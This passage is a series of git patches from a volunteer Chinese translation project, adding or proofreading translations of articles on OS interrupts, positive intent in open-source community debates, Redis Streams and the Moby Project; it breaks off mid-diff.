b/translated/tech/20141028 When Does Your OS Run.md @@ -0,0 +1,53 @@ +操作系统何时运行? +============================================================ + + +请各位思考以下问题:在你阅读本文的这段时间内,计算机中的操作系统在运行吗?又或者仅仅是 Web 浏览器在运行?又或者他们也许均处于空闲状态,等待着你的指示? + +这些问题并不复杂,但他们深入涉及到系统软件工作的本质。为了准确回答这些问题,我们需要透彻理解操作系统的行为模型,包括性能、安全和除错等方面。在该系列文章中,我们将以 Linux 为主举例来帮助你建立操作系统的行为模型,OS X 和 Windows 在必要的时候也会有所涉及。对那些深度探索者,我会在适当的时候给出 Linux 内核源码的链接。 + +这里有一个基本认知,就是,在任意给定时刻,某个 CPU 上仅有一个任务处于活动状态。大多数情形下这个任务是某个用户程序,例如你的 Web 浏览器或音乐播放器,但他也可能是一个操作系统线程。可以确信的是,他是一个任务,不是两个或更多,也不是零个,对,永远是一个。 + +这听上去可能会有些问题。比如,你的音乐播放器是否会独占 CPU 而阻止其他任务运行?从而使你不能打开任务管理工具去杀死音乐播放器,甚至让鼠标点击也失效,因为操作系统没有机会去处理这些事件。你可能会奋而喊出,“他究竟在搞什么鬼?”,并引发骚乱。 + +此时便轮到中断大显身手了。中断就好比,一声巨响或一次拍肩后,神经系统通知大脑去感知外部刺激一般。计算机主板上的芯片组同样会中断 CPU 运行以传递新的外部事件,例如键盘上的某个键被按下、网络数据包的到达、一次硬盘读的完成,等等。硬件外设、主板上的中断控制器和 CPU 本身,他们共同协作实现了中断机制。 + +中断对于簿记我们最珍视的资源--时间也至关重要。计算机启动过程中,操作系统内核会设置一个硬件计时器以让其产生周期性计时中断,例如每隔 10 毫秒触发一次。每当计时中断到来,内核便会收到通知以更新系统统计信息和盘点如下事项:当前用户程序是否已运行了足够长时间?是否有某个 TCP 定时器超时了?中断给予了内核一个处理这些问题并采取合适措施的机会。这就好像你给自己设置了整天的周期闹铃并把他们用作检查点:我是否应该去做我正在进行的工作?是否存在更紧急的事项?直到你发现 10 年时间已逝去。。。 + +这些内核对 CPU 周期性的劫持被称为滴答,也就是说,是中断让操作系统经历了滴答的过程。不止如此,中断也被用作处理一些软件事件,如整数溢出和页错误,其中未涉及外部硬件。中断是进入操作系统内核最频繁也是最重要的入口。对于学习电子工程的人而言,这些并无古怪,他们是操作系统赖以运行的机制。 + +说到这里,让我们再来看一些实际情形。下图示意了 Intel Core i5 系统中的一个网卡中断。图片现在设置了超链,你可以点击他们以获取更为详细的信息,例如每个设备均被链接到了对应的 Linux 驱动源码。 + +![](http://duartes.org/gustavo/blog/img/os/hardware-interrupt.png) + + + +让我们来仔细研究下。首先,由于系统中存在众多中断源,如果硬件只是通知 CPU “嘿,这里发生了一些事情”然后什么也不做,则不太行得通。这会带来难以忍受的冗长等待。因此,计算机上电时,每个设备都被授予了一根中断线,或者称为 IRQ。这些 IRQ 然后被系统中的中断控制器映射成值介于 0 到 255 之间的中断向量。等到中断到达 CPU,他便具备了一个定义良好的数值,异于硬件的某些其他诡异行为。 + +相应地,CPU 中还存有一个由内核维护的指针,指向一个包含 255 个函数指针的数组,其中每个函数被用来处理某个特定的中断向量。后文中,我们将继续深入探讨这个数组,他也被称作中断描述符表(IDT)。 + +每当中断到来,CPU 会用中断向量的值去索引中断描述符表,并执行相应处理函数。这相当于,在当前正在执行任务的上下文中,发生了一个特殊函数调用,从而允许操作系统以较小开销快速对外部事件作出反应。考虑下述场景,Web 服务器在发送数据时,CPU 却间接调用了操作系统函数,这听上去要么很炫酷要么令人惊恐。下图展示了 Vim 编辑器运行过程中一个中断到来的情形。 + +![](http://duartes.org/gustavo/blog/img/os/vim-interrupted.png) + +此处请留意,中断的到来是如何触发 CPU 到 Ring 0 内核模式的切换而未有改变当前活跃的任务。这看上去就像,Vim 编辑器直接面向操作系统内核产生了一次神奇的函数调用,但 Vim 还在那里,他的地址空间原封未动,等待着执行流返回。 + +这很令人振奋,不是么?不过让我们暂且告一段落吧,我需要合理控制篇幅。我知道还没有回答完这个开放式问题,甚至还实质上翻开了新的问题,但你至少知道了在你读这个句子的同时滴答正在发生。我们将在充实了对操作系统动态行为模型的理解之后再回来寻求问题的答案,对 Web 浏览器情形的理解也会变得清晰。如果你仍有问题,尤其是在这篇文章公诸于众后,请尽管提出。我将会在文章或后续评论中回答他们。下篇文章将于明天在 RSS 和 Twitter 上发布。 + +-------------------------------------------------------------------------------- + +via: http://duartes.org/gustavo/blog/post/when-does-your-os-run/ + +作者:[gustavo ][a] +译者:[Cwndmiao](https://github.com/Cwndmiao) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://duartes.org/gustavo/blog/about/ +[1]:http://duartes.org/gustavo/blog/post/motherboard-chipsets-memory-map +[2]:http://duartes.org/gustavo/blog/post/kernel-boot-process +[3]:http://duartes.org/gustavo/blog/post/cpu-rings-privilege-and-protection +[4]:http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory +[5]:http://feeds.feedburner.com/GustavoDuarte +[6]:http://twitter.com/food4hackers From d49ef83e87992c74b0235cf116259861d335755b Mon Sep 17 00:00:00 2001 From: Chao-zhi Liu Date: Wed, 29 Nov 2017 00:51:46 +0800 Subject: [PATCH 0034/1627] Update and rename sources/talk/20170119 Be a force for good in your community.md to translated/talk/20170119 Be a force for good in your community.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 翻译完成 --- ...9 Be a force for good in your community.md | 130 ------------------ ...9 Be a force for good in your community.md | 128 +++++++++++++++++ 2 files changed, 128 insertions(+), 130 deletions(-) delete mode 100644 sources/talk/20170119 Be a force for good in your community.md create mode 100644 translated/talk/20170119 Be a force for good in your community.md diff --git a/sources/talk/20170119 Be a force for good in your community.md b/sources/talk/20170119 Be a force for good in your community.md deleted file mode 100644 index 22c43d8470..0000000000 --- a/sources/talk/20170119 Be a force for good in your community.md +++ /dev/null @@ -1,130 +0,0 @@ -Translating by chao-zhi - -Be a force for good in your community -============================================================ - ->Find out how to give the gift of an out, learn about the power of positive intent, and more. - - ![Be a force for good in your community](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/people_remote_teams_world.png?itok=wI-GW8zX "Be a force for good in your community") - ->Image by : opensource.com - -Passionate debate is among the hallmark traits of open source communities and open organizations. On our best days, these debates are energetic and constructive. They are heated, yet moderated with humor and goodwill. All parties remain focused on facts, on the shared purpose of collaborative problem-solving, and driving continuous improvement. And for many of us, they're just plain fun. - -On our worst days, these debates devolve into rehashing the same old arguments on the same old topics. Or we turn on one another, delivering insults—passive-aggressive or outright nasty, depending on our style—and eroding the passion, trust, and productivity of our communities. - -We've all been there, watching and feeling helpless, as a community conversation begins to turn toxic. Yet, as [DeLisa Alexander recently shared][1], there are so many ways that each and every one of us can be a force for good in our communities. - -In the first article of this "open culture" series, I will share a few strategies for how you can intervene, in that crucial moment, and steer everyone to a more positive and productive place. - -### Don't call people out. Call them up. - -Recently, I had lunch with my friend and colleague, [Mark Rumbles][2]. Over the years, we've collaborated on a number of projects that support open culture and leadership at Red Hat. On this day, Mark asked me how I was holding up, as he saw I'd recently intervened in a mailing list conversation when I saw the debate was getting ugly. - -Fortunately, the dust had long since settled, and in fact I'd almost forgotten about the conversation. Nevertheless, it led us to talk about the challenges of open and frank debate in a community that has thousands of members. - ->One of the biggest ways we can be a force for good in our communities is to respond to conflict in a way that compels everyone to elevate their behavior, rather than escalate it. - -Mark said something that struck me as rather insightful. He said, "You know, as a community, we are really good at calling each other out. But what I'd like to see us do more of is calling each other _up_." - -Mark is absolutely right. One of the biggest ways we can be a force for good in our communities is to respond to conflict in a way that compels everyone to elevate their behavior, rather than escalate it. - -### Assume positive intent - -We can start by making a simple assumption when we observe poor behavior in a heated conversation: It's entirely possible that there are positive intentions somewhere in the mix. - -This is admittedly not an easy thing to do. When I see signs that a debate is turning nasty, I pause and ask myself what Steven Covey calls The Humanizing Question: - -"Why would a reasonable, rational, and decent person do something like this?" - -Now, if this is one of your "usual suspects"—a community member with a propensity toward negative behavior--perhaps your first thought is, "Um, what if this person _isn't_ reasonable, rational, or decent?" - -Stay with me, now. I'm not suggesting that you engage in some touchy-feely form of self-delusion. It's called The Humanizing Question not only because asking it humanizes the other person, but also because it humanizes _you_. - -And that, in turn, helps you respond or intervene from the most productive possible place. - -### Seek to understand the reasons for community dissent - -When I ask myself why a reasonable, rational, and decent person might do something like this, time and again, it comes down to the same few reasons: - -* They don't feel heard. -* They don't feel respected. -* They don't feel understood. - -One easy positive intention we can apply to almost any poor behavior, then, is that the person wants to be heard, respected, or understood. That's pretty reasonable, I suppose. - -By standing in this more objective and compassionate place, we can see that their behavior is _almost certainly _**_not_**_ going to help them get what they want, _and that the community will suffer as a result . . . without our help. - -For me, that inspires a desire to help everyone get "unstuck" from this ugly place we're in. - -Before I intervene, though, I ask myself a follow-up question: _What other positive intentions might be driving this behavior?_ - -Examples that readily jump to mind include: - -* They are worried that we're missing something important, or we're making a mistake, and no one else seems to see it. -* They want to feel valued for their contributions. -* They are burned out, because of overworking in the community or things happening in their personal life. -* They are tired of something being broken and frustrated that no one else seems to see the damage or inconvenience that creates. -* ...and so on and so forth. - -With that, I have a rich supply of positive intent that I can ascribe to their behavior. I'm ready to reach out and offer them some help, in the form of an out. - -### Give the gift of an out - -What is an out? Think of it as an escape hatch. It's a way to exit the conversation, or abandon the poor behavior and resume behaving like a decent person, without losing face. It's calling someone up, rather than calling them out. - -You've probably experienced this, as some point in your life, when _you_ were behaving poorly in a conversation, ranting and hollering and generally raising a fuss about something or another, and someone graciously offered _you_ a way out. Perhaps they chose not to "take the bait" by responding to your unkind choice of words, and instead, said something that demonstrated they believed you were a reasonable, rational, and decent human being with positive intentions, such as: - -> _So, uh, what I'm hearing is that you're really worried about this, and you're frustrated because it seems like no one is listening. Or maybe you're concerned that we're missing the significance of it. Is that about right?_ - -And here's the thing: Even if that wasn't entirely true (perhaps you had less-than-noble intentions), in that moment, you probably grabbed ahold of that life preserver they handed you, and gladly accepted the opportunity to reframe your poor behavior. You almost certainly pivoted and moved to a more productive place, likely without even recognizing it. - -Perhaps you said something like, "Well, it's not that exactly, but I just worry that we're headed down the wrong path here, and I get what you're saying that as community, we can't solve every problem at the same time, but if we don't solve this one soon, bad things are going to happen…" - -In the end, the conversation almost certainly began to move to a more productive place, or you all agreed to disagree. - -We all have the opportunity to offer an upset person a safe way out of that destructive place they're operating from. Here's how. - -### Bad behavior or bad actor? - -If the person is particularly agitated, they may not hear or accept the first out you hand them. That's okay. Most likely, their lizard brain--that prehistoric amygdala that was once critical for human survival—has taken over, and they need a few more moments to recognize you're not a threat. Just keep gently but firmly treating them as if they _were_ a rational, reasonable, decent human being, and watch what happens. - -In my experience, these community interventions end in one of three ways: - -Most often, the person actually _is_ a reasonable person, and soon enough, they gratefully and graciously accept the out. In the process, everyone breaks out of the black vs. white, "win or lose" mindset. People begin to think up creative alternatives and "win-win" outcomes that benefit everyone. - ->Why would a reasonable, rational, and decent person do something like this? - -Occasionally, the person is not particularly reasonable, rational, or decent by nature, but when treated with such consistent, tireless, patient generosity and kindness (by you), they are shamed into retreating from the conversation. This sounds like, "Well, I think I've said all I have to say. Thanks for hearing me out." Or, for less enlightened types, "Well, I'm tired of this conversation. Let's drop it." (Yes, please. Thank you.) - -Less often, the person is what's known as a _bad actor_, or in community management circles, a pot-stirrer. These folks do exist, and they thrive on drama. Guess what? By consistently engaging in a kind, generous, community-calming way, and entirely ignoring all attempts to escalate the situation, you effectively shift the conversation into an area that holds little interest for them. They have no choice but to abandon it. Winners all around. - -That's the power of assuming positive intent. By responding to angry and hostile words with grace and dignity, you can diffuse a flamewar, untangle and solve tricky problems, and quite possibly make a new friend or two in the process. - -Am I successful every time I apply this principle? Heck, no. But I never regret the choice to assume positive intent. And I can vividly recall a few unfortunate occasions when I assumed negative intent and responded in a way that further contributed to the problem. - -Now it's your turn. I'd love to hear about some strategies and principles you apply, to be a force for good when conversations get heated in your community. Share your thoughts in the comments below. - -Next time, we'll explore more ways to be a force for good in your community, and I'll share some tips for handling "Mr. Grumpy." - --------------------------------------------------------------------------------- - -作者简介: - -![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/headshot-square_0.jpg?itok=FS97b9YD) - -Rebecca Fernandez is a Principal Employment Branding + Communications Specialist at Red Hat, a contributor to The Open Organization book, and the maintainer of the Open Decision Framework. She is interested in open source and the intersection of the open source way with business management models. Twitter: @ruhbehka - --------------------------------------------------------------------------------- - -via: https://opensource.com/open-organization/17/1/force-for-good-community - -作者:[Rebecca Fernandez][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/rebecca -[1]:https://opensource.com/business/15/5/5-ways-promote-inclusive-environment -[2]:https://twitter.com/leadership_365 diff --git a/translated/talk/20170119 Be a force for good in your community.md b/translated/talk/20170119 Be a force for good in your community.md new file mode 100644 index 0000000000..035409c4c1 --- /dev/null +++ b/translated/talk/20170119 Be a force for good in your community.md @@ -0,0 +1,128 @@ +成为你所在社区的美好力量 +============================================================ + +>明白如何传递美好,了解积极意愿的力量,以及更多。 + + ![Be a force for good in your community](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/people_remote_teams_world.png?itok=wI-GW8zX "Be a force for good in your community") + +>图片来自:opensource.com + +激烈的争论是开源社区和开放组织的标志特征之一。在我们最好的日子里,这些争论充满活力和建设性。他们面红耳赤的背后其实是幽默和善意。各方实事求是,共同解决问题,推动持续改进。对我们中的许多人来说,他们只是单纯的娱乐而已。 + +然而在我们最糟糕的日子里,这些争论演变成了对旧话题的反复争吵。或者我们用各种方式来传递伤害和相互攻击,或是使用卑劣的手段,而这些侵蚀着我们社区的激情、信任和生产力。 + +我们茫然四顾,束手无策,因为社区的对话开始变得有毒。然而,正如 [DeLisa Alexander最近的分享][1],我们每个人都有很多方法可以成为我们社区的一种力量。 + +在这个“开源文化”系列的第一篇文章中,我将分享一些策略,教你如何在这个关键时刻进行干预,引导每个人走向更积极、更有效率的方向。 + +### 不要将人推开,而是将人推向前方 + +最近,我和我的朋友和同事 [Mark Rumbles][2] 一起吃午饭。多年来,我们在许多支持开源文化和引领 Red Hat 的项目中合作。在这一天,马克问我是怎么坚持的,当我看到辩论变得越来越丑陋的时候,他看到我最近介入了一个邮件列表的对话。 + +幸运的是,这事早已尘埃落定,事实上我几乎忘记了谈话的内容。然而,它让我们开始讨论如何在一个拥有数千名成员的社区里,公开和坦率的辩论。 + +>在我们的社区里,我们成为一种美好力量的最好的方法之一就是:在回应冲突时,以一种迫使每个人提升他们的行为,而不是使冲突升级的方式。 + +Mark 说了一些让我印象深刻的话。他说:“你知道,作为一个社区,我们真的很擅长将人推开。但我想看到的是,我们更多的是互相扶持 _向前_ 。” + +Mark 是绝对正确的。在我们的社区里,我们成为一种美好力量的最好的方法之一就是:在回应冲突时,以一种迫使每个人提升他们的行为,而不是使冲突升级的方式。 + +### 积极意愿假想 + +我们可以从一个简单的假想开始,当我们在一个激烈的对话中观察到不良行为时:完全有可能该不良行为其实有着积极意愿。 + +诚然,这不是一件容易的事情。当我看到一场辩论正在变得肮脏的迹象时,我停下来问自己,史蒂芬·科维(Steven Covey)所说的人性化问题是什么: + +“为什么一个理性、正直的人会做这样的事情?” + +现在,如果他是你的一个“普通的观察对象”——一个有消极行为倾向的社区成员——也许你的第一个想法是,“嗯,也许这个人是个不靠谱,不理智的人” + +回过头来说。我并不是说你让你自欺欺人。这其实就是人性化的问题,不仅是因为它让你理解别人的立场,它还让你变得人性化。 + +而这反过来又能帮助你做出反应,或者从最有效率的地方进行干预。 + +### 寻求了解社区异议的原因 + +当我再一次问自己为什么一个理性的、正直的人可能会做这样的事情时,归结为几个原因: + +* 他认为没人聆听他 +* 他认为没人尊重他 +* 他认为没人理解他 + +一个简单的积极意愿假想,我们可以适用于几乎所有的不良行为,其实就是那个人想要被聆听,被尊重,或被理解。我想这是相当合理的。 + +通过站在这个更客观、更有同情心的角度,我们可以看到他们的行为几乎肯定 **_不_** 会帮助他们得到他们想要的东西,而社区也会因此而受到影响。如果没有我们的帮助的话。 + +对我来说,这激发了一个愿望:帮助每个人从我们所处的这个丑陋的地方“摆脱困境”。 + +在我介入之前,我问自己一个后续的问题:是否有其他积极的意图可能会驱使这种行为 + +容易想到的例子包括: + +* 他们担心我们错过了一些重要的东西,或者我们犯了一个错误,没有人能看到它。 +* 他们想为自己的贡献感到有价值。 +* 他们精疲力竭,因为在社区里工作过度或者在他们的个人生活中发生了一些事情。 +* 他们讨厌一些东西被破坏,并感到沮丧,因为没有人能看到造成的伤害或不便。 +* ……诸如此类。 + +有了这些,我就有了丰富的积极的意图假想,我可以为他们的行为找到原因。我准备伸出援助之手,向他们提供一些帮助。 + +### 传递美好,挣脱泥潭 + +什么是 an out?(类似与佛家“解脱法门”的意思)把它想象成一个逃跑的门。这是一种退出对话的方式,或者放弃不良的行为,恢复表现得像一个体面的人,而不是丢面子。是叫某人振作向上,而不是叫他走开。 + +你可能经历过这样的事情,在你的生活中,当 _你_ 在一次谈话中表现不佳时,咆哮着,大喊大叫,对某事大惊小怪,而有人慷慨地给 _你_ 提供了一个台阶下。也许他们选择不去和你“抬杠”,相反,他们说了一些表明他们相信你是一个理性、正直的人,他们采用积极意愿假想,比如: + +> _所以,嗯,我听到的是你真的很担心,你很沮丧,因为似乎没有人在听。或者你担心我们忽略了它的重要性。是这样对吧?_ + +于是乎:即使这不是完全正确的(也许你的意图不那么高尚),在那一刻,你可能抓住了他们提供给你的台阶,并欣然接受了重新定义你的不良行为的机会。你几乎可以肯定地转向一个更富有成效的角度,甚至你自己可能都没有意识到。 + +也许你这样说,“哦,虽然不完全是这样,但我只是担心,我们这样会走向歧途,我明白你说的,作为社区,我们不能同时解决所有问题,但如果我们不尽快解决这个问题,会有更多不好的事情要发生……” + +最后,谈话几乎可以肯定地开始转移到一个更有效率的方向。 + +我们都有机会让一个沮丧的人挣脱泥潭,而这就是方法。 + +### 坏行为还是坏人? + +如果这个人特别激动,他们可能不会听到或者接受你给出的第一台阶。没关系。最可能的是,他们迟钝的大脑已经被史前曾经对人类生存至关重要的杏仁核接管了,他们需要更多的时间来认识到你并不是一个威胁。只是需要你保持温和的态度,坚定地对待他们,就好像他们 _曾经是_ 一个理性、正直的人,看看会发生什么。 + +根据我的经验,这些社区干预以三种方式结束: + +大多数情况下,这个人实际上 _是_ 一个理性的人,很快,他们就感激地接受了这个事实。在这个过程中,每个人都跳出了“黑与白”,“赢或输”的心态。人们开始思考创造性的选择和“双赢”的结果,每个人都将受益。 + +> 为什么一个理性、正直的人会做这样的事呢? + +有时候,这个人天生不是特别理性或正直的,但当他被你以如此一致的、不知疲倦的、耐心的慷慨和善良的对待的时候,他们就会羞愧地从谈话中撤退。这听起来像是,“嗯,我想我已经说了所有要说的了。谢谢你听我的意见”。或者,对于不那么开明的人来说,“嗯,我厌倦了这种谈话。让我们结束吧。”(好的,谢谢)。 + +更少的情况是,这个人是一个“_坏人_”,或者在社区管理圈子里,是一个“搅屎棍”。这些人确实存在,而且他们在演戏方面很有发展。你猜怎么着?通过持续地以一种友善、慷慨、以社区为中心的方式,完全无视所有试图使局势升级的尝试,你有效地将谈话变成了一个对他们没有兴趣的领域。他们别无选择,只能放弃它。你成为赢家。 + +这就是积极意愿假想的力量。通过对愤怒和充满敌意的言辞做出回应,优雅而有尊严地回应,你就能化解一场战争,理清混乱,解决棘手的问题,而且在这个过程中很有可能会交到一个新朋友。 + +我每次应用这个原则都成功吗?见鬼,不。但我从不后悔选择了积极意愿。但是我能生动的回想起,当我采用消极意愿假想时,将问题变得更糟糕的场景。 + +现在轮到你了。我很乐意听到你提出的一些策略和原则,当你的社区里的对话变得激烈的时候,要成为一股好力量。在下面的评论中分享你的想法。 + +下次,我们将探索更多的方法,在你的社区里成为一个美好力量,我将分享一些处理“坏脾气先生”的技巧。 + +-------------------------------------------------------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/headshot-square_0.jpg?itok=FS97b9YD) + +丽贝卡·费尔南德斯(Rebecca Fernandez)是红帽公司(Red Hat)的首席就业品牌 + 通讯专家,是《开源组织》书籍的贡献者,也是开源决策框架的维护者。她的兴趣是开源和业务管理模型的开源方式。Twitter:@ruhbehka + +-------------------------------------------------------------------------------- + +via: https://opensource.com/open-organization/17/1/force-for-good-community + +作者:[Rebecca Fernandez][a] +译者:[chao-zhi](https://github.com/chao-zhi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/rebecca +[1]:https://opensource.com/business/15/5/5-ways-promote-inclusive-environment +[2]:https://twitter.com/leadership_365 From e6c7090529181b0071775907dbf79b1b3500936f Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 29 Nov 2017 05:02:44 +0800 Subject: [PATCH 0035/1627] PRF:20171003 Streams a new general purpose data structure in Redis.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 部分校对 --- ... a new general purpose data structure in Redis.md | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/translated/tech/20171003 Streams a new general purpose data structure in Redis.md b/translated/tech/20171003 Streams a new general purpose data structure in Redis.md index bb21a1bd93..39da54d0cf 100644 --- a/translated/tech/20171003 Streams a new general purpose data structure in Redis.md +++ b/translated/tech/20171003 Streams a new general purpose data structure in Redis.md @@ -1,15 +1,13 @@ -[Streams:Redis中新的一个通用数据结构][1] +streams:一个新的 Redis 通用数据结构 ================================== +直到几个月以前,对于我来说,在消息传递的环境中,streams 只是一个有趣且相对简单的概念。在 Kafka 流行这个概念之后,我主要研究它们在 Disque 实例中的用途。Disque 是一个将会转化为 Redis 4.2 的模块的消息队列。后来我发现 Disque 全都是 AP 消息,它将在不需要客户端过多参与的情况下实现容错和保证送达,因此,我认为 streams 的概念在那种情况下并不适用。 -直到几个月以前,对于我来说,在消息传递的环境中,streams 只是一个有趣且相对简单的概念。在 Kafka 概念普及之后,我主要研究他们在 Disque 实例中的效能。Disque 是一个将被转化到 Redis 4.2 模块中的消息队列。后来我明白 Disque 将是关于 AP 消息的全部,它将在不需要客户端过多参与的情况下实现容错和保证送达,因此,我认为 streams 的概念在那种情况下并不适用。 +但是,在 Redis 中有一个问题,那就是缺省情况下导出数据结构并不轻松。它在 Redis 列表、排序集和发布/订阅(Pub/Sub)能力上有某些缺陷。你可以合适地使用这些工具去模拟一个消息或事件的序列,而有所权衡。排序集是大量耗费内存的,不能自然的模拟一次又一次的相同消息的传递,客户端不能阻塞新消息。因为一个排序集并不是一个序列化的数据结构,它是一个根据它们量的变化而移动的元素集:它不是很像时间系列一样的东西。列表有另外的问题,它在某些特定的用例中产生类似的适用性问题:你无法浏览列表中部是什么,因为在那种情况下,访问时间是线性的。此外,没有任何的指定输出功能,列表上的阻塞操作仅为单个客户端提供单个元素。列表中没有固定的元素标识,也就是说,不能指定从哪个元素开始给我提供内容。对于一到多的工作负载,这里有发布/订阅,它在大多数情况下是非常好的,但是,对于某些不想“即发即弃”的东西:保留一个历史是很重要的,而不是断开之后重新获得消息,也因为某些消息列表,像时间系列,在用范围查询浏览时,是非常重要的:在这 10 秒范围内我的温度读数是多少? -但是,在 Redis 中有一个问题,那就是从缺省导出数据结构并不轻松。它在 Redis 列表、排序集和发布/订阅(Pub/Sub)能力上有某些缺陷,你可以权衡差异,友好地使用这些工具去模拟一个消息或事件的序列。排序集是大量耗费内存的,不能用相同的消息模型一次又一次的传递,客户端不能阻塞新消息。因为一个排序集并不是一个序列化的数据结构,它是一个根据他们量的变化而变化的元素集:它不是像时间系列一样很适合的东西。列表有另外的问题,它在某些用户案例中产生适用性问题:你无法浏览列表中是什么,因为在那种情况下,访问时间是线性的。此外,没有任何输出,列表上的阻塞操作仅为单个客户端提供单个元素。比如说:从那个元素开始给我提供内容,列表中也没有固定的元素标识。对于一到多的工作负载,这里有发布/订阅,它在大多数情况下是非常好的,但是,对于某些不想“即发即弃”的东西:去保留一个历史是很重要的,而不是断开之后重新获得消息,也因为某些消息列表,像时间系列,在用范围查询浏览时,是非常重要的:在这 10 秒范围内我的温度读数是多少? +这有一种方法可以尝试处理上面的问题,我计划对排序集进行通用化,并列入一个唯一的、更灵活的数据结构,然而,我的设计尝试最终以生成一个比当前的数据结构更加矫揉造作的结果而结束。一个关于 Redis 数据结构导出的更好的想法是,让它更像天然的计算机科学的数据结构,而不是,“Salvatore 发明的 API”。因此,在最后我停止了我的尝试,并且说,“ok,这是我们目前能提供的”,或许,我将为发布/订阅增加一些历史信息,或者将来对列表访问增加一些更灵活的方式。然而,每次在会议上有用户对我说“你如何在 Redis 中模拟时间系列” 或者类似的问题时,我的脸就绿了。 -这有一种方法可以尝试处理上面的问题,计划对排序集进行通用化,并列入一个唯一的更灵活的数据结构,然而,我的设计尝试最终以生成一个相对当前的人造的数据结构的结果结束,一个关于 Redis 数据结构导出的更好的想法是,让它更像天然的计算机科学的数据结构。而不是, “Salvatore 发明的 API”。因此,在最后我停止了我的尝试,并且说,“ok,这是我们目前能提供的”,或许,我将为发布/订阅增加一些历史,或者将来对列表访问增加一些更灵活的方式。然而,每次在会议上有用户对我说“你如何在 Redis 中模拟时间系列” 或者类似的问题时,我的脸变绿了。 - -起源 -======= +### 起源 在将 Redis 4.0 中的模块介绍完之后,用户开始去看他们自己怎么去修复这些问题。他们之一,Timothy Downs,通过 IRC 写信给我: From 5e88cdfea6b7ac7b67dfefd848b544f00c295aa5 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 29 Nov 2017 05:42:35 +0800 Subject: [PATCH 0036/1627] PRF&PUB:20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md @geekpi https://linux.cn/article-9090-1.html --- ... THE SOFTWARE CONTAINERIZATION MOVEMENT.md | 30 +++++++++---------- 1 file changed, 14 insertions(+), 16 deletions(-) rename {translated/tech => published}/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md (73%) diff --git a/translated/tech/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md b/published/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md similarity index 73% rename from translated/tech/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md rename to published/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md index cd2ce76527..9069b01ed9 100644 --- a/translated/tech/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md +++ b/published/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md @@ -1,27 +1,27 @@ -介绍 MOBY 项目:推进软件容器化运动的一个新的开源项目 +介绍 Moby 项目:推进软件容器化运动的一个新的开源项目 ============================================================ ![Moby Project](https://i0.wp.com/blog.docker.com/wp-content/uploads/1-2.png?resize=763%2C275&ssl=1) -自从 Docker 四年前将软件容器推向民主化以来,整个生态系统都围绕着容器化而发展,在这段压缩的时期,它经历了两个不同的增长阶段。在这每一个阶段,生产容器系统的模式已经演变成适应用户群体以及项目的规模和需求和不断增长的贡献者生态系统。 +自从 Docker 四年前将软件容器推向大众化以来,整个生态系统都围绕着容器化而发展,在这段这么短的时期内,它经历了两个不同的增长阶段。在这每一个阶段,生产容器系统的模式已经随着项目和不断增长的容器生态系统而演变适应用户群体的规模和需求。 -Moby 是一个新的开源项目,旨在推进软件容器化运动,帮助生态系统将容器作为主流。它提供了一个组件库,一个将它们组装到定制的基于容器的系统的框架,以及所有容器爱好者进行实验和交换想法的地方。 +Moby 是一个新的开源项目,旨在推进软件容器化运动,帮助生态系统将容器作为主流。它提供了一个组件库,一个将它们组装到定制的基于容器的系统的框架,也是所有容器爱好者进行实验和交换想法的地方。 让我们来回顾一下我们如何走到今天。在 2013-2014 年,开拓者开始使用容器,并在一个单一的开源代码库,Docker 和其他一些项目中进行协作,以帮助工具成熟。 ![Docker Open Source](https://i0.wp.com/blog.docker.com/wp-content/uploads/2-2.png?resize=975%2C548&ssl=1) -然后在 2015-2016 年,云原生应用中大量采用容器用于生产环境。在这个阶段,用户社区已经发展到支持成千上万个部署,由数百个生态系统项目和成千上万的贡献者支持。正是在这个阶段,Docker 将其生产模式演变为基于开放式组件的方法。这样,它使我们能够增加创新和合作的方面。 +然后在 2015-2016 年,云原生应用中大量采用容器用于生产环境。在这个阶段,用户社区已经发展到支持成千上万个部署,由数百个生态系统项目和成千上万的贡献者支持。正是在这个阶段,Docker 将其产品模式演变为基于开放式组件的方法。这样,它使我们能够增加创新和合作的方面。 -涌现出来的新独立的 Docker 组件项目帮助刺激了合作伙伴生态系统和用户社区的发展。在此期间,我们从 Docker 